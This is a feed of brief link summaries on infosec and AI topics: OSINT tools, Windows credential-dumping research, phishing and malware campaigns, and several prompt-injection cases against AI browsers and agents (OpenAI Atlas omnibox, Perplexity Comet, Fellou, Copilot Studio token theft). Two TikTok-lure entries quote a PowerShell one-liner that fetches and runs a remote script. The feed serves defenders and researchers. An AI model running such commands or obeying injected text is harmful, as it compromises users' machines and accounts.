Curated AI+OSINT index highlighting ChatGPT/Grok prompt guides, image ID tools like Lenso.ai, and GEOINT tools such as GeoSpy and GeoGPT. Resource portal for investigators. #ai #osint #bookmark https://bit.ly/3WYaDWZ

Windows service triggers can enable low‑privilege starts of services (RemoteRegistry, WebClient, EFS). Enumerate via sc qtriggerinfo, registry TriggerInfo or QueryServiceConfig2. TrustedSec maps trigger types and activation methods. #windows #service #infosec https://bit.ly/48LDll9

Malformed URL-like input to OpenAI Atlas's omnibox is parsed as a user prompt when URL validation fails, enabling prompt injection (example embeds: "visit neuraltrust.ai"). This allows attacker instructions to run with elevated trust. #promptinjection #omnibox #AIsecurity https://bit.ly/47roiuF

PoC that recovers text from screenshots pixelized with a linear box filter by matching pixel blocks against De Bruijn search images; supports gamma-encoded averaging and linear sRGB; limited by box-detection accuracy. #tool #depixelization https://bit.ly/3JrOD3z

CoPhish abuses copilotstudio.microsoft.com demo sites and a customized Login topic to redirect victims and exfiltrate OAuth/session tokens (sent to attacker endpoints such as a Burp Collaborator URL). Datadog disclosed; Microsoft will patch. #CopilotStudio #OAuth #Phishing https://bit.ly/4od9GGq

Collection of Claude API recipes and copyable examples: classification, RAG with Pinecone, embeddings via Voyage AI, and multimodal image handling. Resource-focused GitHub cookbook. #tool #bookmark https://bit.ly/3WGEqnb

Python GitHub repo with website and port scanners, OSINT modules, builders including Discord RAT, ransomware generator, DoS module and obfuscator. Claims open-source verification and AV-detected samples folder. #tool #osint #security https://bit.ly/3Wm5Bn6

Proofpoint published PDF Object Hashing, an open-source detector that fingerprints PDF object types/order to link malicious PDFs. Handles compressed streams and encrypted objects for better attribution. #PDF #tool #infosec https://bit.ly/4oDYeTX

Hidden faint text in screenshots can be OCRed and accepted as commands by Perplexity Comet; Fellou forwards visited page content to its LLM, allowing injected site text to override intent. #promptinjection #OCR #AIsecurity https://bit.ly/43rTw3q

Tykit phishing kit uses SVG-embedded JS that XOR-decodes a payload and evals it to redirect to fake Microsoft 365 login pages; persistent C2 reuse (segy2.cc) and staged client-side auth validation observed. #phishing #Tykit #Microsoft365 https://bit.ly/42UTyAP

SpecterOps finds new credential-dumping techniques that can extract secrets from Windows 11/Server 2025 with Credential Guard enabled, targeting LSA/lsass.exe by abusing SSPI/SSP behaviors. #CredentialGuard #VBS #LSA https://bit.ly/3Jma1Hp

Extracts Kerberos tickets from the Windows LSA cache by impersonating SYSTEM; uses LsaEnumerateLogonSessions and LsaCallAuthenticationPackage and outputs Base64 TGTs. #Kerberos #tool https://bit.ly/3L2dr2M

Mass-assignment on driverscategorisation.fia.com allowed updating roles via PUT /api/users/{id}, enabling escalation to ADMIN and exposing PII fields like birthDate and profile data. #mass_assignment #privilege_escalation #FIA https://bit.ly/4qm52Y0

Self-hosted ConvertX converts 1000+ formats using backends such as ImageMagick, FFmpeg, Pandoc; supports batch jobs, password-protected outputs and multi-account management. #tool #fileconversion #selfhosted https://bit.ly/47C2wWc

PingOneHound extends BloodHound CE/Enterprise to enumerate identity-based attack paths in PingOne, highlighting SAML/OIDC federation and group role assignment nuances. #PingOne #BloodHound #tool https://bit.ly/47xtD4G

AI-assisted FunkLocker encrypts files locally (.funksec), abuses taskkill/sc/net/PowerShell to stop services, and exhibits weak opsec allowing a public decryptor. #FunkLocker #ransomware #AI https://bit.ly/3WgEIRq

Course CS6038/CS5138 covers static/dynamic malware analysis, Ghidra scripting (Ghidra 10.1 API hosted), and hands-on labs. Virtualization requirements: 4 cores, 16GB RAM, 150GB disk. #malware #ghidra #education https://bit.ly/47xT4mF

ARES is a PowerShell AD toolkit for authorized testing: enumerates SPNs, AS-REP accounts, KRBTGT status and GPOs; includes Kerberoast, AS-REP roast and rate-limited password spraying. #tool #kerberos #AD https://bit.ly/4n9f2B3

Doxxing of alleged Lumma Stealer operators and compromised Telegram accounts coincided with a steep fall in sample detections and C2 activity; customers shifted to Vidar and StealC. #lumma_stealer #water_kurita #doxxing https://bit.ly/46Z8SyJ

BlackBasta exfiltrated over 6M records from Capita in Mar 2023; ICO’s Oct 2025 report cites control failures across multiple legal entities and a £14M fine. #BlackBasta #Capita #ransomware https://bit.ly/4os7gTS

Full AI Fundamentals 100 video (3+ hrs) from The Cyber Mentor: Intro to neural networks, NLP, LLMs and self-hosting LLMs. Free labs and a completion certificate are available via TCM Security Academy. #AI #LLMs #TCMSecurity https://bit.ly/3J3MISP

Self-hosted no-code scraper: Scraperr uses XPath extraction, domain spidering and media downloads; backend stores results in MongoDB and exposes APIs via FastAPI. #tool #webscraping https://bit.ly/4qAmPen

DPRK actor UNC5342 stores JavaScript payloads in smart contracts (Ethereum, BNB Smart Chain); loader retrieves via eth_call and delivers JADESNOW / INVISIBLEFERRET, enabling crypto theft and resilient C2. #EtherHiding #UNC5342 #JADESNOW https://bit.ly/4qlCSfY

ExCyTIn-Bench evaluates LLM agents on threat hunting with an interactive MySQL database and generated security Q&A tests; dataset on Hugging Face; evaluations updated with Qwen‑235B and Grok‑4. #tool #LLM #dataset https://bit.ly/4nbwRj0

TikTok lure uses PowerShell iex (irm slmgr.win/photoshop) to fetch a script (SHA256: 6D897B56...) that downloads AuroStealer (updater.exe) and a self‑compiling loader (source.exe). #aurostealer #tiktok #malware https://bit.ly/4o2w7y2

TikTok clips push a PowerShell one-liner that loads a malicious script (SHA256 6d897b...) leading to updater.exe (AuroStealer) and a self-compiling loader using csc.exe. #AuroStealer #PowerShell #TikTok https://bit.ly/4o2w7y2

Microsoft report: 52%+ of attacks with known motives tied to extortion/ransomware; 80% involved data theft; AI is accelerating phishing and malware development; MFA blocks >99% of identity attacks. #ransomware #MFA #AI https://bit.ly/3KTnFSY

Anthropic released Claude Skills: modular Markdown "skills" loaded on-demand via frontmatter YAML. Supports .pdf/.docx/.xlsx/.pptx, can run helper scripts (e.g., GIF builder) and checks like check_slack_size. #claude_skills #tool #anthropic https://bit.ly/3WJ2oOo

YouTube video "stealing passwords" (ID DhP2Hw-6DgY) is listed but metadata and technical indicators are not provided in the input. #password_theft #infosec https://bit.ly/42Jqegz

Netcraft uncovered Basic Auth phishing that embeds gmo-aozora[.]com in the username to spoof GMO Aozora; landing domains coylums[.], blitzfest[.], pavelrehurek[.] share /sKgdiq pages with a Japanese CAPTCHA. #phishing #basic_auth https://bit.ly/4n4m8GX

ClatScope aggregates Perplexity, HaveIBeenPwned, Hunter and RapidAPI for deep IP/domain/email recon; Mini edition requires no API keys; paid subscriptions include pre-provisioned, rotated API keys with usage tracking. #tool #OSINT https://bit.ly/4qeF34y

Pulseway RMM spotted in incidents: supports silent install and remote exec (CMD/PowerShell). Key artifacts: service 'PC Monitor', scheduled task 'PulsewayServiceCheck', registry HKLM\SOFTWARE\MMSOFT Design\PC Monitor. #Pulseway #RMM #DFIR https://bit.ly/4nXB3nQ

Agentic AI Red Teaming Playbook: end-to-end methods for agentic layers, covering prompt injection, RAG data exfiltration, tool-chaining, and exploitation techniques. Practical, battle-tested examples. #redteaming #AI #LLMsecurity https://bit.ly/3WEgBMw

Ducky bundles SSH/Telnet/Serial terminals, SNMP topology mapper, multi-threaded port scanner, subnet calculator and NIST CVE lookup into one PySide6 desktop GUI. #tool #python #snmp https://bit.ly/4n5vgLA

Public websites often hold API keys, DB strings, S3/GCS tokens and staging/admin URLs — the guide shows how these secrets are commonly discovered and why one leak can cascade into larger compromise. #infosec #osint #bugbounty https://bit.ly/4nKD8TT

Preconfigured Windows VM for DFIR investigations with a pinned DFIR_Toolbar and Explorer right-click integrations for artifact and disk-image parsing. Inspired by SIFT Workstation. #DFIR #WindowsForensics #tool https://bit.ly/3J6cZQb

ZeroTier builds a software-defined overlay with peer-to-peer direct connections, end-to-end encryption, and unique cryptographic IDs for device trust — targets IoT, SD‑WAN, and VPN use cases. #tool #zerotier https://bit.ly/3IK9ajP

Wyrm v0.3 Hatchling: Rust post‑exploitation C2 with HTTP(S) agents, custom below‑TLS encryption, dynamic payload staging and anti‑YARA IOCs. #tool #redteam https://bit.ly/4qbgQMz

Windows 11 Recall stores screenshots at %AppData%\Local\CoreAIPlatform...; Exif.Photo.MakerNote contains window title, path and timestamps; uses DiskANN DBs SemanticTextStore.sidb and SemanticImageS for search. #Windows11 #Recall #DFIR https://bit.ly/46NKIak

n8n workflow drives a Telegram AI agent that recognizes meals from photos, returns calorie and macro breakdowns, and logs results to a personal nutrition table. #n8n #Telegram #tool https://bit.ly/4haAUe6

Paper2Video turns a paper+image+audio into a presentation video via PaperTalker; key components: slide generation, subtitling, cursor grounding, speech synthesis, and talking‑head rendering. Released code and a HuggingFace dataset. #paper2video #tool https://bit.ly/4nJteBX

Claude Code now supports plugins bundling slash commands, subagents, MCP servers and hooks; installable via /plugin in public beta and discoverable via marketplaces using a claude-plugin/marketplace.json. #plugins #MCP #tool https://bit.ly/42AIFUG

Astaroth campaign uses .lnk→mshta to drop AutoIT files (Corsair.Yoga.06342.8476.366.log/.exe) and stack.tmp, exfiltrates via Ngrok, and pulls steganographic configs from GitHub images to maintain resilience. #Astaroth #GitHub #Ngrok https://bit.ly/4qcZi2W

Schneider's PANDA pilot uses the OpenAI API with RAG to query internal protocol DBs and deliver grounded pediatric decision support at the bedside. Designed to prevent hallucinations. #AI #ChatGPT #tool https://bit.ly/4712Zj9

Injection into antivirus-protected processes used to drop backdoors into AV install folders; defenses include Protected Process Light (PPL), SYSTEM privileges, process introspection, ImagePath validation and DLL signing. #antivirus #PPL #process_injection https://bit.ly/4h4FLxg

Hidden GenAI risks: prompt injection, guardrail bypass, model extraction and RAG poisoning. Article reviews alignment techniques, external guardrails, open vs closed-source defenses, and prompt defense systems. #LLM #GenAI #security https://bit.ly/47rwXNN

Codex can orchestrate AI agents to build cloud apps; Alex Finn calls it underrated and demos five starter tricks to get going. #Codex #AI #tool https://bit.ly/3IEaUeo

9-hour live Bug Bounty Boot Camp on YouTube — full free session described as focused on kickstarting bug bounty skills; long-form training resource. Video ID: 5RZKlaPDF4s #bugbounty #infosec #training https://bit.ly/46NjZuA

Browser-based admin panel for plugin marketplaces in Claude Code; supports multiple marketplaces per company and centralized plugin management via the claude-code-templates package. #tool #plugins #marketplaces https://bit.ly/4qbmApS

Detection Engineering moves SOCs to Detection-as-Code: versioned detections, Sigma/KQL/SPL logic, and Atomic Red Team validation to reduce noise and manage detection decay. #detectionengineering #Sigma #MITRE_ATTACK https://bit.ly/4q4w9qn